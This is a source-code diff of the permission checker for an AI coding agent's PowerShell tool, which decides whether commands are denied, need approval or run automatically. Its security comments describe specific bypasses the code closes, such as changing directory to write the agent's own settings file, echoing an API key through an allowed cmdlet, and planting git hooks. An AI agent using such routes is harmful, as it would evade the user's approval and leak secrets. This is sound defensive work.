+ // - Module prefixes (`Microsoft.PowerShell.Management\Remove-Item`):
1058
+ // element.name has the module prefix stripped.
1059
+ for (const { text: subCmd, element } of allSubCommands) {
1060
+ // element.name is quote-stripped at the parser (transformCommandAst) so
1061
+ // `& 'Invoke-Expression' 'x'` yields name='Invoke-Expression', not
1062
+ // "'Invoke-Expression'". canonicalSubCmd is built from the same stripped
1063
+ // name, so deny-rule prefix matching on `Invoke-Expression:*` hits.
1064
+ const canonicalSubCmd =
1065
+ element.name !== '' ? [element.name, ...element.args].join(' ') : null
1066
+
1067
+ const subInput = { command: subCmd }
1068
+ const { matchingDenyRules: subDenyRules, matchingAskRules: subAskRules } =
1069
+ matchingRulesForInput(subInput, toolPermissionContext, 'prefix')
1070
+ let matchedDenyRule = subDenyRules[0]
1071
+ let matchedAskRule = subAskRules[0]
1072
+
1073
+ if (matchedDenyRule === undefined && canonicalSubCmd !== null) {
1074
+ const {
1075
+ matchingDenyRules: canonicalDenyRules,
1076
+ matchingAskRules: canonicalAskRules,
1077
+ } = matchingRulesForInput(
1078
+ { command: canonicalSubCmd },
1079
+ toolPermissionContext,
1080
+ 'prefix',
1081
+ )
1082
+ matchedDenyRule = canonicalDenyRules[0]
1083
+ if (matchedAskRule === undefined) {
1084
+ matchedAskRule = canonicalAskRules[0]
1085
+ }
1086
+ }
1087
+
1088
+ if (matchedDenyRule !== undefined) {
1089
+ decisions.push({
1090
+ behavior: 'deny',
1091
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${command} has been denied.`,
1092
+ decisionReason: {
1093
+ type: 'rule',
1094
+ rule: matchedDenyRule,
1095
+ },
1096
+ })
1097
+ } else if (matchedAskRule !== undefined) {
1098
+ decisions.push({
1099
+ behavior: 'ask',
1100
+ message: createPermissionRequestMessage(POWERSHELL_TOOL_NAME),
1101
+ decisionReason: {
1102
+ type: 'rule',
1103
+ rule: matchedAskRule,
1104
+ },
1105
+ })
1106
+ }
1107
+ }
1108
+
1109
+ // Decision: cd+git compound guard — was step 4.42 (:805-833).
1110
+ // When cd/Set-Location is paired with git, don't allow without prompting —
1111
+ // cd to a malicious directory makes git dangerous (fake hooks, bare repo
1112
+ // attacks). Collect-then-reduce keeps the improvement over BashTool: in
1113
+ // bash, cd+git (B9, line 1416) runs BEFORE sub-command deny (B11), so cd+git
1114
+ // ask masks deny. Here, both are in the same decision array; deny wins.
1115
+ //
1116
+ // SECURITY: NO cd-to-CWD no-op exclusion. A previous iteration excluded
1117
+ // `Set-Location .` as a no-op, but the "first non-dash arg" heuristic used
1118
+ // to extract the target is fooled by colon-bound params:
1119
+ // `Set-Location -Path:/etc .` — real target is /etc, heuristic sees `.`,
1120
+ // exclusion fires, bypass. The UX case (model emitting `Set-Location .; foo`)
1121
+ // is rare; the attack surface isn't worth the special-case. Any cd-family
1122
+ // cmdlet in the compound sets this flag, period.
1123
+ // Only flag compound cd when there are multiple sub-commands. A standalone
1124
+ // `Set-Location ./subdir` is not a TOCTOU risk (no later statement resolves
1125
+ // relative paths against stale cwd). Without this, standalone cd forces the
1126
+ // compound guard, suppressing the per-subcommand auto-allow path. (bug #25)
1127
+ const hasCdSubCommand =
1128
+ allSubCommands.length > 1 &&
1129
+ allSubCommands.some(({ element }) => isCwdChangingCmdlet(element.name))
1130
+ // Symlink-create compound guard (finding #18 / bug 001+004): when the
1131
+ // compound creates a filesystem link, subsequent writes through that link
1132
+ // land outside the validator's view. Same TOCTOU shape as cwd desync.
1133
+ const hasSymlinkCreate =
1134
+ allSubCommands.length > 1 &&
1135
+ allSubCommands.some(({ element }) => isSymlinkCreatingCommand(element))
1136
+ const hasGitSubCommand = allSubCommands.some(
1137
+ ({ element }) => resolveToCanonical(element.name) === 'git',
1138
+ )
1139
+ if (hasCdSubCommand && hasGitSubCommand) {
1140
+ decisions.push({
1141
+ behavior: 'ask',
1142
+ message:
1143
+ 'Compound commands with cd/Set-Location and git require approval to prevent bare repository attacks',
1144
+ })
1145
+ }
1146
+
1147
+ // cd+write compound guard — SUBSUMED by checkPathConstraints(compoundCommandHasCd).
1148
+ // Previously this block pushed 'ask' when hasCdSubCommand && hasAcceptEditsWrite,
1149
+ // but checkPathConstraints now receives hasCdSubCommand and pushes 'ask' for ANY
1150
+ // path operation (read or write) in a cd-compound — broader coverage at the path
1151
+ // layer (BashTool parity). The step-5 !hasCdSubCommand gates and modeValidation's
1152
+ // compound-cd guard remain as defense-in-depth for paths that don't reach
1153
+ // checkPathConstraints (e.g., cmdlets not in CMDLET_PATH_CONFIG).
1154
+
1155
+ // Decision: bare-git-repo guard — bash parity.
1156
+ // If cwd has HEAD/objects/refs/ without a valid .git/HEAD, Git treats
1157
+ // cwd as a bare repository and runs hooks from cwd. Attacker creates
1158
+ // hooks/pre-commit, deletes .git/HEAD, then any git subcommand runs it.
1159
+ // Port of BashTool readOnlyValidation.ts isCurrentDirectoryBareGitRepo.
1160
+ if (hasGitSubCommand && isCurrentDirectoryBareGitRepo()) {
1161
+ decisions.push({
1162
+ behavior: 'ask',
1163
+ message:
1164
+ 'Git command in a directory with bare-repository indicators (HEAD, objects/, refs/ in cwd without .git/HEAD). Git may execute hooks from cwd.',
1165
+ })
1166
+ }
1167
+
1168
+ // Decision: git-internal-paths write guard — bash parity.
1169
+ // Compound command creates HEAD/objects/refs/hooks/ then runs git → the
1170
+ // git subcommand executes freshly-created malicious hooks. Check all
1171
+ // extracted write paths + redirection targets against git-internal patterns.
1172
+ // Port of BashTool commandWritesToGitInternalPaths, adapted for AST.
1173
+ if (hasGitSubCommand) {
1174
+ const writesToGitInternal = allSubCommands.some(
1175
+ ({ element, statement }) => {
1176
+ // Redirection targets on this sub-command (raw Extent.Text — quotes
1177
+ // and ./ intact; normalizer handles both)
1178
+ for (const r of element.redirections ?? []) {
1179
+ if (isGitInternalPathPS(r.target)) return true
1180
+ }
1181
+ // Write cmdlet args (new-item HEAD; mkdir hooks; set-content hooks/pre-commit)
1182
+ const canonical = resolveToCanonical(element.name)
1183
+ if (!GIT_SAFETY_WRITE_CMDLETS.has(canonical)) return false
1184
+ // Raw arg text — normalizer strips colon-bound params, quotes, ./, case.
1185
+ // PS ArrayLiteralAst (`New-Item a,hooks/pre-commit`) surfaces as a single
1186
+ // comma-joined arg — split before checking.
1187
+ if (
1188
+ element.args
1189
+ .flatMap(a => a.split(','))
1190
+ .some(a => isGitInternalPathPS(a))
1191
+ ) {
1192
+ return true
1193
+ }
1194
+ // Pipeline input: `"hooks/pre-commit" | New-Item -ItemType File` binds the
1195
+ // string to -Path at runtime. The path is in a non-CommandAst pipeline
1196
+ // element, not in element.args. The hasExpressionSource guard at step 5
1197
+ // already forces approval here; this check just adds the git-internal
1198
+ // warning text.
1199
+ if (statement !== null) {
1200
+ for (const c of statement.commands) {
1201
+ if (c.elementType === 'CommandAst') continue
1202
+ if (isGitInternalPathPS(c.text)) return true
1203
+ }
1204
+ }
1205
+ return false
1206
+ },
1207
+ )
1208
+ // Also check top-level file redirections (> hooks/pre-commit)
1209
+ const redirWritesToGitInternal = getFileRedirections(parsed).some(r =>
1210
+ isGitInternalPathPS(r.target),
1211
+ )
1212
+ if (writesToGitInternal || redirWritesToGitInternal) {
1213
+ decisions.push({
1214
+ behavior: 'ask',
1215
+ message:
1216
+ 'Command writes to a git-internal path (HEAD, objects/, refs/, hooks/, .git/) and runs git. This could plant a malicious hook that git then executes.',
1217
+ })
1218
+ }
1219
+ // SECURITY: Archive-extraction TOCTOU. isCurrentDirectoryBareGitRepo
1220
+ // checks at permission-eval time; `tar -xf x.tar; git status` extracts
1221
+ // bare-repo indicators AFTER the check, BEFORE git runs. Unlike write
1222
+ // cmdlets (where we inspect args for git-internal paths), archive
1223
+ // contents are opaque — any extraction in a compound with git must ask.
1224
+ const hasArchiveExtractor = allSubCommands.some(({ element }) =>
1225
+ GIT_SAFETY_ARCHIVE_EXTRACTORS.has(element.name.toLowerCase()),
1226
+ )
1227
+ if (hasArchiveExtractor) {
1228
+ decisions.push({
1229
+ behavior: 'ask',
1230
+ message:
1231
+ 'Compound command extracts an archive and runs git. Archive contents may plant bare-repository indicators (HEAD, hooks/, refs/) that git then treats as the repository root.',
1232
+ })
1233
+ }
1234
+ }
1235
+
1236
+ // .git/ writes are dangerous even WITHOUT a git subcommand — a planted
1237
+ // .git/hooks/pre-commit fires on the user's next commit. Unlike the
1238
+ // bare-repo check above (which gates on hasGitSubCommand because `hooks/`
1239
+ // is a common project dirname), `.git/` is unambiguous.
1240
+ {
1241
+ const found =
1242
+ allSubCommands.some(({ element }) => {
1243
+ for (const r of element.redirections ?? []) {
1244
+ if (isDotGitPathPS(r.target)) return true
1245
+ }
1246
+ const canonical = resolveToCanonical(element.name)
1247
+ if (!GIT_SAFETY_WRITE_CMDLETS.has(canonical)) return false
1248
+ return element.args.flatMap(a => a.split(',')).some(isDotGitPathPS)
1249
+ }) || getFileRedirections(parsed).some(r => isDotGitPathPS(r.target))
1250
+ if (found) {
1251
+ decisions.push({
1252
+ behavior: 'ask',
1253
+ message:
1254
+ 'Command writes to .git/ — hooks or config planted there execute on the next git operation.',
1255
+ })
1256
+ }
1257
+ }
1258
+
1259
+ // Decision: path constraints — was step 4.44 (:835-845).
1260
+ // The deny-capable check that was being masked by earlier asks. Returns
1261
+ // 'deny' when an Edit(...) deny rule matches an extracted path (pathValidation
1262
+ // lines ~994, 1088, 1160, 1210), 'ask' for paths outside working dirs, or
1263
+ // 'passthrough'.
1264
+ //
1265
+ // Thread hasCdSubCommand (BashTool compoundCommandHasCd parity): when the
1266
+ // compound contains a cwd-changing cmdlet, checkPathConstraints forces 'ask'
1267
+ // for any statement with path operations — relative paths resolve against the
1268
+ // stale validator cwd, not PowerShell's runtime cwd. This is the architectural
1269
+ // fix for the CWD-desync cluster (findings #3/#21/#27/#28), replacing the
1270
+ // per-auto-allow-site guards with a single gate at the path-resolution layer.
1271
+ const pathResult = checkPathConstraints(
1272
+ input,
1273
+ parsed,
1274
+ toolPermissionContext,
1275
+ hasCdSubCommand,
1276
+ )
1277
+ if (pathResult.behavior !== 'passthrough') {
1278
+ decisions.push(pathResult)
1279
+ }
1280
+
1281
+ // Decision: exact allow (parse-succeeded case) — was step 4.45 (:861-867).
1282
+ // Matches BashTool ordering: sub-command deny → path constraints → exact
1283
+ // allow. Reduce enforces deny > ask > allow, so the exact allow only
1284
+ // surfaces when no deny or ask fired — same as sequential.
1285
+ //
1286
+ // SECURITY: nameType gate — mirrors the parse-failed guard at L696-700.
1287
+ // Input-side stripModulePrefix is unconditional: `scripts\Get-Content`
1288
+ // strips to `Get-Content`, canonicalCommand matches exact allow. Without
1289
+ // this gate, allow enters decisions[] and reduce returns it before step 5
1290
+ // can inspect nameType — PowerShell runs the local .ps1 file. The AST's
1291
+ // nameType for the first command element is authoritative when parse
1292
+ // succeeded; 'application' means a script/executable path, not a cmdlet.
1293
+ // SECURITY: Same argLeaksValue gate as the per-subcommand loop below
1294
+ // (finding #32). Without it, `PowerShell(Write-Output:*)` exact-matches
1295
+ // `Write-Output $env:ANTHROPIC_API_KEY`, pushes allow to decisions[], and
1296
+ // reduce returns it before the per-subcommand gate ever runs. The
1297
+ // allSubCommands.every check ensures NO command in the statement leaks
1298
+ // (a single-command exact-allow has one element; a pipeline has several).
1299
+ //
1300
+ // SECURITY: nameType gate must check ALL subcommands, not just [0]
1301
+ // (finding #10). canonicalCommand at L171 collapses `\n` → space, so
1302
+ // `code\n.\build.ps1` (two statements) matches exact rule
1303
+ // `PowerShell(code .\build.ps1)`. Checking only allSubCommands[0] lets the
1304
+ // second statement (nameType=application, a script path) through. Require
1305
+ // EVERY subcommand to have nameType !== 'application'.
1306
+ if (
1307
+ exactMatchResult.behavior === 'allow' &&
1308
+ allSubCommands[0] !== undefined &&
1309
+ allSubCommands.every(
1310
+ sc =>
1311
+ sc.element.nameType !== 'application' &&
1312
+ !argLeaksValue(sc.text, sc.element),
1313
+ )
1314
+ ) {
1315
+ decisions.push(exactMatchResult)
1316
+ }
1317
+
1318
+ // Decision: read-only allowlist — was step 4.5 (:869-885).
1319
+ // Mirrors Bash auto-allow for ls, cat, git status, etc. PowerShell
1320
+ // equivalents: Get-Process, Get-ChildItem, Get-Content, git log, etc.
1321
+ // Reduce places this below sub-command ask rules (ask > allow).
1322
+ if (isReadOnlyCommand(command, parsed)) {
1323
+ decisions.push({
1324
+ behavior: 'allow',
1325
+ updatedInput: input,
1326
+ decisionReason: {
1327
+ type: 'other',
1328
+ reason: 'Command is read-only and safe to execute',
1329
+ },
1330
+ })
1331
+ }
1332
+
1333
+ // Decision: file redirections — was :887-900.
1334
+ // Redirections (>, >>, 2>) write to arbitrary paths. isReadOnlyCommand
1335
+ // already rejects redirections internally so this can't conflict with the
1336
+ // read-only allow above. Reduce places it above checkPermissionMode allow.
1337
+ const fileRedirections = getFileRedirections(parsed)
1338
+ if (fileRedirections.length > 0) {
1339
+ decisions.push({
1340
+ behavior: 'ask',
1341
+ message:
1342
+ 'Command contains file redirections that could write to arbitrary paths',
1343
+ suggestions: suggestionForExactCommand(command),
1344
+ })
1345
+ }
1346
+
1347
+ // Decision: mode-specific handling (acceptEdits) — was step 4.7 (:902-906).
1348
+ // checkPermissionMode only returns 'allow' | 'passthrough'.
1349
+ const modeResult = checkPermissionMode(input, parsed, toolPermissionContext)
1350
+ if (modeResult.behavior !== 'passthrough') {
1351
+ decisions.push(modeResult)
1352
+ }
1353
+
1354
+ // REDUCE: deny > ask > allow > passthrough. First of each behavior type
1355
+ // wins (preserves step-order messaging for single-check cases). If nothing
1356
+ // decided, fall through to step 5 per-sub-command approval collection.
1357
+ const deniedDecision = decisions.find(d => d.behavior === 'deny')
1358
+ if (deniedDecision !== undefined) {
1359
+ return deniedDecision
1360
+ }
1361
+ const askDecision = decisions.find(d => d.behavior === 'ask')
1362
+ if (askDecision !== undefined) {
1363
+ return askDecision
1364
+ }
1365
+ const allowDecision = decisions.find(d => d.behavior === 'allow')
1366
+ if (allowDecision !== undefined) {
1367
+ return allowDecision
1368
+ }
1369
+
1370
+ // 5. Pipeline/statement splitting: check each sub-command independently.
1371
+ // This prevents a prefix rule like "Get-Process:*" from silently allowing
1372
+ // piped commands like "Get-Process | Stop-Process -Force".
1373
+ // Note: deny rules are already checked above (4.4), so this loop handles
1374
+ // ask rules, explicit allow rules, and read-only allowlist fallback.
1375
+
1376
+ // Filter out safe output cmdlets (Format-Table, etc.) — they were checked
1377
+ // for deny rules in step 4.4 but shouldn't need independent approval here.
1378
+ // Also filter out cd/Set-Location to CWD (model habit, Bash parity).
1379
+ const subCommands = allSubCommands.filter(({ element, isSafeOutput }) => {
1380
+ if (isSafeOutput) {
1381
+ return false
1382
+ }
1383
+ // SECURITY: nameType gate — sixth location. Filtering out of the approval
1384
+ // list is a form of auto-allow. scripts\\Set-Location . would match below
1385
+ // (stripped name 'Set-Location', arg '.' → CWD) and be silently dropped,
1386
+ // then scripts\\Set-Location.ps1 executes with no prompt. Keep 'application'
1387
+ // commands in the list so they reach isAllowlistedCommand (which rejects them).
1388
+ if (element.nameType === 'application') {
1389
+ return true
1390
+ }
1391
+ const canonical = resolveToCanonical(element.name)
1392
+ if (canonical === 'set-location' && element.args.length > 0) {
1393
+ // SECURITY: use PS_TOKENIZER_DASH_CHARS, not ASCII-only startsWith('-').
1394
+ // `Set-Location –Path .` (en-dash) would otherwise treat `–Path` as the
1395
+ // target, resolve it against cwd (mismatch), and keep the command in the
1396
+ // approval list — correct. But `Set-Location –LiteralPath evil` with
1397
+ // en-dash would find `–LiteralPath` as "target", mismatch cwd, stay in
1398
+ // list — also correct. The risk is the inverse: a Unicode-dash parameter
1399
+ // being treated as the positional target. Use the tokenizer dash set.
1400
+ const target = element.args.find(
1401
+ a => a.length === 0 || !PS_TOKENIZER_DASH_CHARS.has(a[0]!),
1402
+ )
1403
+ if (target && resolve(getCwd(), target) === getCwd()) {
1404
+ return false
1405
+ }
1406
+ }
1407
+ return true
1408
+ })
1409
+
1410
+ // Note: cd+git compound guard already ran at step 4.42. If we reach here,
1411
+ // either there's no cd or no git in the compound.
1412
+
1413
+ const subCommandsNeedingApproval: string[] = []
1414
+ // Statements whose sub-commands were PUSHED to subCommandsNeedingApproval
1415
+ // in the step-5 loop below. The fail-closed gate (after the loop) only
1416
+ // pushes statements NOT tracked here — prevents duplicate suggestions where
1417
+ // both "Get-Process" (sub-command) AND "$x = Get-Process" (full statement)
1418
+ // appear.
1419
+ //
1420
+ // SECURITY: track on PUSH only, not on loop entry.
1421
+ // If a statement's only sub-commands `continue` via user allow rules
1422
+ // (L1113), marking it seen at loop-entry would make the fail-closed gate
1423
+ // skip it — auto-allowing invisible non-CommandAst content like bare
1424
+ // `$env:SECRET` inside control flow. Example attack: user approves
1425
+ // Get-Process, then `if ($true) { Get-Process; $env:SECRET }` — Get-Process
1426
+ // is allow-ruled (continue, no push), $env:SECRET is VariableExpressionAst
1427
+ // (not a sub-command), statement marked seen → gate skips → auto-allow →
1428
+ // secret leaks. Tracking on push only: statement stays unseen → gate fires
1429
+ // → ask.
1430
+ const statementsSeenInLoop = new Set<
1431
+ ParsedPowerShellCommand['statements'][number]
1432
+ >()
1433
+
1434
+ for (const { text: subCmd, element, statement } of subCommands) {
1435
+ // Check deny rules FIRST - user explicit rules take precedence over allowlist
1436
+ const subInput = { command: subCmd }
1437
+ const subResult = powershellToolCheckPermission(
1438
+ subInput,
1439
+ toolPermissionContext,
1440
+ )
1441
+
1442
+ if (subResult.behavior === 'deny') {
1443
+ return {
1444
+ behavior: 'deny',
1445
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${command} has been denied.`,
1446
+ decisionReason: subResult.decisionReason,
1447
+ }
1448
+ }
1449
+
1450
+ if (subResult.behavior === 'ask') {
1451
+ if (statement !== null) {
1452
+ statementsSeenInLoop.add(statement)
1453
+ }
1454
+ subCommandsNeedingApproval.push(subCmd)
1455
+ continue
1456
+ }
1457
+
1458
+ // Explicitly allowed by a user rule — BUT NOT for applications/scripts.
1459
+ // SECURITY: INPUT-side stripModulePrefix is unconditional, so
1460
+ // `scripts\Get-Content /etc/shadow` strips to 'Get-Content' and matches
1461
+ // an allow rule `Get-Content:*`. Without the nameType guard, continue
1462
+ // skips all checks and the local script runs. nameType is classified from
1463
+ // the RAW name pre-strip — `scripts\Get-Content` → 'application' (has `\`).
1464
+ // Module-qualified cmdlets also classify 'application' — fail-safe over-fire.
1465
+ // An application should NEVER be auto-allowed by a cmdlet allow rule.
1466
+ if (
1467
+ subResult.behavior === 'allow' &&
1468
+ element.nameType !== 'application' &&
1469
+ !hasSymlinkCreate
1470
+ ) {
1471
+ // SECURITY: User allow rule asserts the cmdlet is safe, NOT that
1472
+ // arbitrary variable expansion through it is safe. A user who allows
1473
+ // PowerShell(Write-Output:*) did not intend to auto-allow
1474
+ // `Write-Output $env:ANTHROPIC_API_KEY`. Apply the same argLeaksValue
1475
+ // gate that protects the built-in allowlist path below — rejects
1476
+ // Variable/Other/ScriptBlock/SubExpression elementTypes and colon-bound
1477
+ // expression children. (security finding #32)
1478
+ //
1479
+ // SECURITY: Also skip when the compound contains a symlink-creating
1480
+ // command (finding — symlink+read gap). New-Item -ItemType SymbolicLink
1481
+ // can redirect subsequent reads to arbitrary paths. The built-in
1482
+ // allowlist path (below) and acceptEdits path both gate on
1483
+ // !hasSymlinkCreate; the user-rule path must too.
1484
+ if (argLeaksValue(subCmd, element)) {
1485
+ if (statement !== null) {
1486
+ statementsSeenInLoop.add(statement)
1487
+ }
1488
+ subCommandsNeedingApproval.push(subCmd)
1489
+ continue
1490
+ }
1491
+ continue
1492
+ }
1493
+ if (subResult.behavior === 'allow') {
1494
+ // nameType === 'application' with a matching allow rule: the rule was
1495
+ // written for a cmdlet, but this is a script/executable masquerading.
1496
+ // Don't continue; fall through to approval (NOT deny — the user may
1497
+ // actually want to run `scripts\Get-Content` and will see a prompt).
1498
+ if (statement !== null) {
1499
+ statementsSeenInLoop.add(statement)
1500
+ }
1501
+ subCommandsNeedingApproval.push(subCmd)
1502
+ continue
1503
+ }
1504
+
1505
+ // SECURITY: fail-closed gate. Do NOT take the allowlist shortcut unless
1506
+ // the parent statement is a PipelineAst where every element is a
1507
+ // CommandAst. This subsumes the previous hasExpressionSource check
1508
+ // (expression sources are one way a statement fails the gate) and also
1509
+ // rejects assignments, chain operators, control flow, and any future
1510
+ // AST type by construction. Examples this blocks:
1511
+ // 'env:SECRET_API_KEY' | Get-Content — CommandExpressionAst element
1512
+ // $x = Get-Process — AssignmentStatementAst
1513
+ // Get-Process && Get-Service — PipelineChainAst
1514
+ // Explicit user allow rules (above) run before this gate but apply their
1515
+ // own argLeaksValue check; both paths now gate argument elementTypes.
1516
+ //
1517
+ // SECURITY: Also skip when the compound contains a cwd-changing cmdlet
1518
+ // (finding #27 — cd+read gap). isAllowlistedCommand validates Get-Content
1519
+ // in isolation, but `Set-Location ~; Get-Content ./.ssh/id_rsa` runs
1520
+ // Get-Content from ~, not from the validator's cwd. Path validation saw
1521
+ // /project/.ssh/id_rsa; runtime reads ~/.ssh/id_rsa. Same gate as the
1522
+ // checkPermissionMode call below and the checkPathConstraints threading.
1523
+ if (
1524
+ statement !== null &&
1525
+ !hasCdSubCommand &&
1526
+ !hasSymlinkCreate &&
1527
+ isProvablySafeStatement(statement) &&
1528
+ isAllowlistedCommand(element, subCmd)
1529
+ ) {
1530
+ continue
1531
+ }
1532
+
1533
+ // Check per-sub-command acceptEdits mode (BashTool parity).
1534
+ // Delegate to checkPermissionMode on a single-statement AST so that ALL
1535
+ // of its guards apply: expression pipeline sources (non-CommandAst elements),
1536
+ // security flags (subexpressions, script blocks, assignments, splatting, etc.),
1537
+ // and the ACCEPT_EDITS_ALLOWED_CMDLETS allowlist. This keeps one source of
1538
+ // truth for what makes a statement safe in acceptEdits mode — any future
1539
+ // hardening of checkPermissionMode automatically applies here.
1540
+ //
1541
+ // Pass parsed.variables (not []) so splatting from any statement in the
1542
+ // compound command is visible. Conservative: if we can't tell which statement
1543
+ // a splatted variable affects, assume it affects all of them.
1544
+ //
1545
+ // SECURITY: Skip this auto-allow path when the compound contains a
1546
+ // cwd-changing command (Set-Location/Push-Location/Pop-Location). The
1547
+ // synthetic single-statement AST strips compound context, so
1548
+ // checkPermissionMode cannot see the cd in other statements. Without this
1549
+ // gate, `Set-Location ./.claude; Set-Content ./settings.json '...'` would
1550
+ // pass: Set-Content is checked in isolation, matches ACCEPT_EDITS_ALLOWED_CMDLETS,
1551
+ // and auto-allows — but PowerShell runs it from the changed cwd, writing to
1552
+ // .claude/settings.json (a Claude config file the path validator didn't check).
1553
+ // This matches BashTool's compoundCommandHasCd guard.
1554
+ if (statement !== null && !hasCdSubCommand && !hasSymlinkCreate) {
1555
+ const subModeResult = checkPermissionMode(
1556
+ { command: subCmd },
1557
+ {
1558
+ valid: true,
1559
+ errors: [],
1560
+ variables: parsed.variables,
1561
+ hasStopParsing: parsed.hasStopParsing,
1562
+ originalCommand: subCmd,
1563
+ statements: [statement],
1564
+ },
1565
+ toolPermissionContext,
1566
+ )
1567
+ if (subModeResult.behavior === 'allow') {
1568
+ continue
1569
+ }
1570
+ }
1571
+
1572
+ // Not allowlisted, no mode auto-allow, and no explicit rule — needs approval
1573
+ if (statement !== null) {
1574
+ statementsSeenInLoop.add(statement)
1575
+ }
1576
+ subCommandsNeedingApproval.push(subCmd)
1577
+ }
1578
+
1579
+ // SECURITY: fail-closed gate (second half). The step-5 loop above only
1580
+ // iterates sub-commands that getSubCommandsForPermissionCheck surfaced
1581
+ // AND survived the safe-output filter. Statements that produce zero
1582
+ // CommandAst sub-commands (bare $env:SECRET) or whose only sub-commands
1583
+ // were filtered as safe-output ($env:X | Out-String) never enter the loop.
1584
+ // Without this, they silently auto-allow on empty subCommandsNeedingApproval.
1585
+ //
1586
+ // Only push statements NOT tracked above: if the loop PUSHED any
1587
+ // sub-command from a statement, the user will see a prompt. Pushing the
1588
+ // statement text too creates a duplicate suggestion where accepting the
1589
+ // sub-command rule does not prevent re-prompting.
1590
+ // If all sub-commands `continue`d (allow-ruled / allowlisted / mode-allowed)
1591
+ // the statement is NOT tracked and the gate re-checks it below — this is
1592
+ // the fail-closed property.
1593
+ for (const stmt of parsed.statements) {
1594
+ if (!isProvablySafeStatement(stmt) && !statementsSeenInLoop.has(stmt)) {
1595
+ subCommandsNeedingApproval.push(stmt.text)
1596
+ }
1597
+ }
1598
+
1599
+ if (subCommandsNeedingApproval.length === 0) {
1600
+ // SECURITY: empty-list auto-allow is only safe when there's nothing
1601
+ // unverifiable. If the pipeline has script blocks, every safe-output
1602
+ // cmdlet was filtered at :1032, but the block content wasn't verified —
1603
+ // non-command AST nodes (AssignmentStatementAst etc.) are invisible to
1604
+ // getAllCommands. `Where-Object {$true} | Sort-Object {$env:PATH='evil'}`
1605
+ // would auto-allow here. hasAssignments is top-level-only (parser.ts:1385)
1606
+ // so it doesn't catch nested assignments either. Prompt instead.
1607
+ if (deriveSecurityFlags(parsed).hasScriptBlocks) {
1608
+ return {
1609
+ behavior: 'ask',
1610
+ message: createPermissionRequestMessage(POWERSHELL_TOOL_NAME),
1611
+ decisionReason: {
1612
+ type: 'other',
1613
+ reason:
1614
+ 'Pipeline consists of output-formatting cmdlets with script blocks — block content cannot be verified',
1615
+ },
1616
+ }
1617
+ }
1618
+ return {
1619
+ behavior: 'allow',
1620
+ updatedInput: input,
1621
+ decisionReason: {
1622
+ type: 'other',
1623
+ reason: 'All pipeline commands are individually allowed',
1624
+ },
1625
+ }
1626
+ }
1627
+
1628
+ // 6. Some sub-commands need approval — build suggestions
1629
+ const decisionReason = {
1630
+ type: 'other' as const,
1631
+ reason: 'This command requires approval',
1632
+ }
1633
+
1634
+ const pendingSuggestions: PermissionUpdate[] = []
1635
+ for (const subCmd of subCommandsNeedingApproval) {
1636
+ pendingSuggestions.push(...suggestionForExactCommand(subCmd))
1637
+ }
1638
+
1639
+ return {
1640
+ behavior: 'passthrough',
1641
+ message: createPermissionRequestMessage(
1642
+ POWERSHELL_TOOL_NAME,
1643
+ decisionReason,
1644
+ ),
1645
+ decisionReason,
1646
+ suggestions: pendingSuggestions,
1647
+ }
1648
+ }